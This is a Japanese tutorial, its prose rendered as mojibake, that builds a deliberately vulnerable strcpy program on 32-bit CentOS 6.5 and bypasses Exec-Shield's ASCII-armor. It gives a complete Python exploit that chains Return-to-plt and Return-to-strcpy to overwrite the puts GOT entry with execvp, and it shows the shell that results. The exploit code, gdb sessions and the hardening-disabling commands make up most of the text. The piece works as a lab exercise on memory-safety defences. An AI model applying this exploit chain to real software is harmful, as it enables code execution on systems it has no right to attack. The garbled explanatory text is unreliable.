Red Hatã‚„CentOSãªã©ã€Exec-Shieldã¨å‘¼ã°ã‚Œã‚‹ã‚»ã‚ュリティモジュールãŒåˆ©ç”¨ã•ã‚Œã¦ã„ã‚‹OSã«ã¯ã€ASCII-armorã¨å‘¼ã°ã‚Œã‚‹ã‚»ã‚ュリティ機構ãŒå˜åœ¨ã™ã‚‹ã€‚ ã“ã“ã§ã¯ã€ASCII-armorã®å‹•ä½œã‚’確èªã—ã€Return-to-strcpyã€Return-to-pltã¨å‘¼ã°ã‚Œã‚‹æ–¹æ³•ã«ã‚ˆã‚‹ã‚·ã‚§ãƒ«èµ·å‹•ã‚’ã‚„ã£ã¦ã¿ã‚‹ã€‚
環境
CentOS 6.5 32bit版
$ uname -a Linux vm-centos32 2.6.32-431.11.2.el6.i686 #1 SMP Tue Mar 25 17:17:46 UTC 2014 i686 i686 i386 GNU/Linux $ cat /etc/redhat-release CentOS release 6.5 (Final) $ gcc --version gcc (GCC) 4.4.7 20120313 (Red Hat 4.4.7-4)
脆弱性ã®ã‚るプãƒã‚°ãƒ©ãƒ を書ã„ã¦ã¿ã‚‹
ãƒãƒƒãƒ•ã‚¡ã‚µã‚¤ã‚º100ã§ã€ã‚³ãƒžãƒ³ãƒ‰ãƒ©ã‚¤ãƒ³å¼•æ•°ã‹ã‚‰ã‚¹ã‚¿ãƒƒã‚¯ãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ãŒèµ·ã“ã›ã‚‹ã‚³ãƒ¼ãƒ‰ã‚’書ã。
/* bof.c */
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buf[100];
strcpy(buf, argv[1]);
puts(buf);
return 0;
}
ASLRã€SSP無効ã€DEP有効ã¨ã—ã¦ã‚³ãƒ³ãƒ‘イルã—ã€ãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ãŒèµ·ã“ã›ã‚‹ã“ã¨ã‚’確èªã™ã‚‹ã€‚
$ sudo sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0
$ gcc -fno-stack-protector bof.c
$ gdb -q a.out
Reading symbols from /home/user/tmp/a.out...(no debugging symbols found)...done.
(gdb) run $(python -c "print 'A'*100")
Starting program: /home/user/tmp/a.out $(python -c "print 'A'*100")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited normally.
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.132.el6.i686
(gdb) run $(python -c "print 'A'*116")
Starting program: /home/user/tmp/a.out $(python -c "print 'A'*116")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) quit
A debugging session is active.
Inferior 1 [process 5067] will be killed.
Quit anyway? (y or n) y
ãƒãƒƒãƒ•ã‚¡ã®4ワード先ã«ãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒã‚ã‚Šã€ãƒãƒƒãƒ•ã‚¡ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ã«ã‚ˆã‚Šä¸Šæ›¸ãã§ãã‚‹ã“ã¨ãŒã‚ã‹ã‚‹ã€‚
ASCII-armorã®å‹•ä½œã‚’確èªã—ã¦ã¿ã‚‹
ASCII-armorã¯Exec-Shieldã®ä¸€æ©Ÿèƒ½ã¨ã—ã¦å®Ÿè£…ã•ã‚Œã¦ã„る。 次ã®ã‚³ãƒžãƒ³ãƒ‰ã‚’実行ã—ã€0以外ã§ã‚ã‚Œã°Exec-ShieldãŒæœ‰åŠ¹ã§ã‚ã‚Šã€ASCII-armorも有効ã«ãªã£ã¦ã„る。
$ sysctl kernel.exec-shield kernel.exec-shield = 1
gdbã§ãƒ¡ãƒ¢ãƒªé…置を確èªã—ã¦ã¿ã‚‹ã€‚
$ gdb -q a.out
Reading symbols from /home/user/tmp/a.out...(no debugging symbols found)...done.
(gdb) start
Temporary breakpoint 1 at 0x80483f7
Starting program: /home/user/tmp/a.out
Temporary breakpoint 1, 0x080483f7 in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.132.el6.i686
(gdb) i proc map
process 5079
cmdline = '/home/user/tmp/a.out'
cwd = '/home/user/tmp'
exe = '/home/user/tmp/a.out'
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x110000 0x12e000 0x1e000 0 /lib/ld-2.12.so
0x12e000 0x12f000 0x1000 0x1d000 /lib/ld-2.12.so
0x12f000 0x130000 0x1000 0x1e000 /lib/ld-2.12.so
0x130000 0x131000 0x1000 0 [vdso]
0x131000 0x2c2000 0x191000 0 /lib/libc-2.12.so
0x2c2000 0x2c4000 0x2000 0x191000 /lib/libc-2.12.so
0x2c4000 0x2c5000 0x1000 0x193000 /lib/libc-2.12.so
0x2c5000 0x2c8000 0x3000 0
0x8048000 0x8049000 0x1000 0 /home/user/tmp/a.out
0x8049000 0x804a000 0x1000 0 /home/user/tmp/a.out
0xb7ff8000 0xb7ff9000 0x1000 0
0xb7fff000 0xb8000000 0x1000 0
0xbffeb000 0xc0000000 0x15000 0 [stack]
(gdb) quit
A debugging session is active.
Inferior 1 [process 5079] will be killed.
Quit anyway? (y or n) y
共有ライブラリã®ç½®ã‹ã‚Œã‚‹ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒ0x00XXXXXXã¨ã„ã£ãŸå°ã•ã„アドレスã«ãªã£ã¦ã„ã‚‹ã“ã¨ãŒã‚ã‹ã‚‹ã€‚ ASCII-armorã¯ã“ã®ã‚ˆã†ã«0x00ã‚’å«ã‚€ã‚¢ãƒ‰ãƒ¬ã‚¹ã«ãƒ©ã‚¤ãƒ–ラリãªã©ã‚’é…ç½®ã™ã‚‹ã“ã¨ã«ã‚ˆã‚Šã€Return-to-libcã«ãŠã‘るライブラリ関数ã¸ã®ã‚¸ãƒ£ãƒ³ãƒ—を難ã—ãã™ã‚‹ä»•çµ„ã¿ã§ã‚る。
Return-to-pltã€Return-to-strcpy
ASCII-armorを回é¿ã™ã‚‹æ–¹æ³•ã¨ã—ã¦ã€Return-to-pltã¨å‘¼ã°ã‚Œã‚‹æ–¹æ³•ãŒçŸ¥ã‚‰ã‚Œã¦ã„る。 ã“ã‚Œã¯ã€å®Ÿè¡Œãƒ•ã‚¡ã‚¤ãƒ«ãŒé…ç½®ã•ã‚Œã‚‹ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒå›ºå®šã§ã‚ã‚‹ã“ã¨ã‚’利用ã—ã€.pltセクションã«ã‚¸ãƒ£ãƒ³ãƒ—ã™ã‚‹ã“ã¨ã§é–“接的ã«ãƒ©ã‚¤ãƒ–ラリ関数を呼ã³å‡ºã™æ–¹æ³•ã§ã‚る。 具体的ã«ã¯Return-to-libcã«ãŠã„ã¦ã€ãƒ©ã‚¤ãƒ–ラリä¸ã®system関数ã«ç›´æŽ¥returnã™ã‚‹ä»£ã‚ã‚Šã«å®Ÿè¡Œãƒ•ã‚¡ã‚¤ãƒ«ã®.pltセクションã«ã‚ã‚‹system@plt関数ã«returnã™ã‚‹ã€‚
ã—ã‹ã—ã€å ´åˆã«ã‚ˆã£ã¦ã¯system関数ãŒå®Ÿè¡Œãƒ•ã‚¡ã‚¤ãƒ«ä¸ã§ä½¿ã‚ã‚Œã¦ãŠã‚‰ãšã€system@plt関数ãŒå˜åœ¨ã—ãªã„ã“ã¨ãŒã‚る。 ã“ã®ã‚ˆã†ãªå ´åˆã«ã¯ã€puts@plt関数ãªã©ä»–ã®PLT関数ã§å‚ç…§ã•ã‚Œã¦ã„ã‚‹GOTアドレスを書ãæ›ãˆãŸå¾Œã€puts@plt関数ã«returnã™ã‚‹ã¨ã„ã†æ–¹æ³•ãŒå–られる。 GOTアドレスã®æ›¸ãæ›ãˆã«ã¯ã€Return-to-pltã«ã‚ˆã‚Šstrcpyã‚„snprintfを呼ã³å‡ºã—ã€å®Ÿè¡Œãƒ•ã‚¡ã‚¤ãƒ«ä¸ã®ãƒã‚¤ãƒˆã‚’1ãƒã‚¤ãƒˆãšã¤è»¢é€ã™ã‚‹ã¨ã„ã†æ–¹æ³•ãŒå–られる。 ã“ã®ã‚ˆã†ãªæ–¹æ³•ã¯ã€Return-to-strcpyã¨å‘¼ã°ã‚Œã‚‹ã“ã¨ãŒã‚る。
エクスプãƒã‚¤ãƒˆã‚³ãƒ¼ãƒ‰ã‚’書ã„ã¦ã¿ã‚‹
上ã§èª¬æ˜Žã—ãŸæ–¹æ³•ã‚’ã‚‚ã¨ã«ã€ã‚¨ã‚¯ã‚¹ãƒ—ãƒã‚¤ãƒˆã‚³ãƒ¼ãƒ‰ã‚’書ã„ã¦ã¿ã‚‹ã€‚ ãŸã ã—ã€GOTアドレスをsystem関数ã«æ›¸ãæ›ãˆã‚ˆã†ã¨ã—ãŸå ´åˆã€ä»Šå›žã®ç’°å¢ƒã§ã¯ã‚¢ãƒ‰ãƒ¬ã‚¹ã«å«ã¾ã‚Œã‚‹0xc2を実行ファイルä¸ã‹ã‚‰è¦‹ã¤ã‘ã‚‹ã“ã¨ãŒã§ããªã„。
$ gdb -q a.out
Reading symbols from /home/user/tmp/a.out...(no debugging symbols found)...done.
(gdb) start
Temporary breakpoint 1 at 0x80483f7
Starting program: /home/user/tmp/a.out
Temporary breakpoint 1, 0x080483f7 in main ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.132.el6.i686
(gdb) p system
$1 = {<text variable, no debug info>} 0x16c210 <system>
(gdb) i proc map
process 1230
cmdline = '/home/user/tmp/a.out'
cwd = '/home/user/tmp'
exe = '/home/user/tmp/a.out'
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x110000 0x12e000 0x1e000 0 /lib/ld-2.12.so
0x12e000 0x12f000 0x1000 0x1d000 /lib/ld-2.12.so
0x12f000 0x130000 0x1000 0x1e000 /lib/ld-2.12.so
0x130000 0x131000 0x1000 0 [vdso]
0x131000 0x2c2000 0x191000 0 /lib/libc-2.12.so
0x2c2000 0x2c4000 0x2000 0x191000 /lib/libc-2.12.so
0x2c4000 0x2c5000 0x1000 0x193000 /lib/libc-2.12.so
0x2c5000 0x2c8000 0x3000 0
0x8048000 0x8049000 0x1000 0 /home/user/tmp/a.out
0x8049000 0x804a000 0x1000 0 /home/user/tmp/a.out
0xb7ff8000 0xb7ff9000 0x1000 0
0xb7fff000 0xb8000000 0x1000 0
0xbffeb000 0xc0000000 0x15000 0 [stack]
(gdb) find/1 0x8048000,0x804a000-1,(char)0xc2
Pattern not found.
(gdb) quit
A debugging session is active.
Inferior 1 [process 1230] will be killed.
Quit anyway? (y or n) y
ãã“ã§ã€æ›¸ãæ›ãˆã‚‹å…ˆã®é–¢æ•°ã¨ã—ã¦system関数ã®ä»£ã‚ã‚Šã«execvp関数を使ã†ã“ã¨ã«ã™ã‚‹ã€‚
$ man execvp
EXEC(3) Linux Programmer’s Manual EXEC(3)
NAME
execl, execlp, execle, execv, execvp - execute a file
SYNOPSIS
#include <unistd.h>
extern char **environ;
int execl(const char *path, const char *arg, ...);
int execlp(const char *file, const char *arg, ...);
int execle(const char *path, const char *arg,
..., char * const envp[]);
int execv(const char *path, char *const argv[]);
int execvp(const char *file, char *const argv[]);
DESCRIPTION
The exec() family of functions replaces the current process image with a new process image. The functions described in this manual page are front-ends for execve(2).
(See the manual page for execve(2) for further details about the replacement of the current process image.)
execvp関数ã¯ã€å®Ÿè¡Œãƒ•ã‚¡ã‚¤ãƒ«åã€å®Ÿè¡Œãƒ•ã‚¡ã‚¤ãƒ«ã«ä¸Žãˆã‚‹å¼•æ•°ã®é…åˆ—ã‚’é †ã«å¼•æ•°ã«å–る。
ãã—ã¦ã€execv関数ã¨ã®é•ã„ã¨ã—ã¦ã€å®Ÿè¡Œãƒ•ã‚¡ã‚¤ãƒ«åã«ã¤ã„ã¦æŽ¢ç´¢ãƒ‘ã‚¹ã‚’é †ã«è¾¿ã£ã¦å®Ÿè¡Œã‚’試ã¿ã‚‹ã€‚
ãŸã¨ãˆã°ã€æ¬¡ã®ã‚ˆã†ã«execvp関数ã«å®Ÿè¡Œãƒ•ã‚¡ã‚¤ãƒ«åã¨ã—ã¦shを与ãˆå‘¼ã³å‡ºã™ã‚³ãƒ¼ãƒ‰ã‚’書ã„ã¦ã¿ã‚‹ã€‚
/* execvp.c */
#include <unistd.h>
int main()
{
char *args[] = {"sh", NULL};
execvp(args[0], args);
return 0;
}
コンパイルã—ã€straceコマンドã§ã‚·ã‚¹ãƒ†ãƒ コール呼ã³å‡ºã—を追ã£ã¦ã¿ã‚‹ã¨ã€æ¬¡ã®ã‚ˆã†ã«ãªã‚‹ã€‚
$ gcc execvp.c
$ strace ./a.out
execve("./a.out", ["./a.out"], [/* 26 vars */]) = 0
...
execve("/usr/local/bin/sh", ["sh"], [/* 26 vars */]) = -1 ENOENT (No such file or directory)
execve("/bin/sh", ["sh"], [/* 26 vars */]) = 0
...
æŽ¢ç´¢ãƒ‘ã‚¹ã‚’é †ã«è¾¿ã£ãŸçµæžœã€/bin/shãŒexecveシステムコールã«ã‚ˆã£ã¦å®Ÿè¡Œã•ã‚Œã¦ã„ã‚‹ã“ã¨ãŒåˆ†ã‹ã‚‹ã€‚
以上をもã¨ã«ã€puts@plt関数ãŒå‚ç…§ã™ã‚‹GOTアドレスをexecvp関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’1ãƒã‚¤ãƒˆãšã¤è»¢é€ã™ã‚‹ã“ã¨ã«ã‚ˆã£ã¦æ›¸ãæ›ãˆãŸå¾Œã€puts@plt関数ã«returnã™ã‚‹ã‚¨ã‚¯ã‚¹ãƒ—ãƒã‚¤ãƒˆã‚³ãƒ¼ãƒ‰ã‚’書ãã¨æ¬¡ã®ã‚ˆã†ã«ãªã‚‹ã€‚ ã“ã“ã§ã€execvp関数ã®å¼•æ•°ã¨ã—ã¦ä¸Žãˆã‚‹ãƒã‚¤ãƒ³ã‚¿ãŒæŒ‡ã™ãƒ‡ãƒ¼ã‚¿ã¯ã€æ›¸ãæ›ãˆãŒå¯èƒ½ãªbssセグメントã«1ãƒã‚¤ãƒˆãšã¤è»¢é€ã™ã‚‹ã“ã¨ã«ã‚ˆã£ã¦æº–å‚™ã™ã‚‹ã€‚ ã¾ãŸã€å¿…è¦ãªãƒã‚¤ãƒˆãŒã©ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã«ã‚ã‚‹ã‹ã¯ã€gdbã®findコマンドを使ã£ã¦æŽ¢ã™ã€‚
# exploit.py
import sys
import struct
from subprocess import Popen
bufsize = int(sys.argv[1])
addr_plt_strcpy = 0x08048314 # objdump -d -j.plt a.out
addr_pop2 = 0x80483c3 # objdump -d a.out | grep -A1 pop
addr_got_puts = 0x804968c # objdump -d -j.plt a.out
addr_plt_puts = 0x08048324 # objdump -d -j.plt a.out
addr_bss = 0x08049694 # readelf -S a.out
def strcpy(dest, src):
buf = struct.pack('<I', addr_plt_strcpy)
buf += struct.pack('<I', addr_pop2)
buf += struct.pack('<I', dest)
buf += struct.pack('<I', src)
return buf
buf = 'A' * bufsize
buf += 'AAAA' * 3
# (gdb) p execvp
# $1 = {<text variable, no debug info>} 0x1d30f0 <execvp>
buf += strcpy(addr_got_puts, 0x8048347) # (gdb) find/1 0x8048000,0x804a000-1,(char)0xf0
buf += strcpy(addr_got_puts+1, 0x80481ec) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x30
buf += strcpy(addr_got_puts+2, 0x804839a) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x1d
buf += strcpy(addr_got_puts+3, 0x8048007) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x00
buf += strcpy(addr_bss, 0x804838d) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x9c
buf += strcpy(addr_bss+1, 0x804828d) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x96
buf += strcpy(addr_bss+2, 0x804801a) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x04
buf += strcpy(addr_bss+3, 0x804801b) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x08
buf += strcpy(addr_bss+4, 0x8048007) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x00
buf += strcpy(addr_bss+5, 0x8048007) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x00
buf += strcpy(addr_bss+6, 0x8048007) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x00
buf += strcpy(addr_bss+7, 0x8048007) # (gdb) find/1 0x8048000,0x804a000-1,(char)0x00
buf += strcpy(addr_bss+8, 0x804870b) # (gdb) find/1 0x8048000,0x804a000-1,"sh"
buf += struct.pack('<I', addr_plt_puts)
buf += 'AAAA'
buf += struct.pack('<I', addr_bss+8)
buf += struct.pack('<I', addr_bss)
with open('buf', 'wb') as f:
f.write(buf)
p = Popen(['./a.out', buf])
p.wait()
ASLRを無効ã«ã—å†åº¦ã‚³ãƒ³ãƒ‘イルã—ãŸä¸Šã§ã€ã‚¨ã‚¯ã‚¹ãƒ—ãƒã‚¤ãƒˆã‚³ãƒ¼ãƒ‰ã‚’実行ã—ã¦ã¿ã‚‹ã€‚
$ sudo sysctl -w kernel.randomize_va_space=0 kernel.randomize_va_space = 0 $ gcc -fno-stack-protector bof.c $ python exploit.py 100 (snip) sh-4.1$ id uid=500(user) gid=500(user) groups=500(user) sh-4.1$ exit
ASCII-armorãŠã‚ˆã³DEPãŒæœ‰åŠ¹ãªçŠ¶æ³ä¸‹ã§ã€Return-to-pltã«ã‚ˆã‚Šã‚·ã‚§ãƒ«ãŒèµ·å‹•ã§ãã¦ã„ã‚‹ã“ã¨ãŒç¢ºèªã§ããŸã€‚
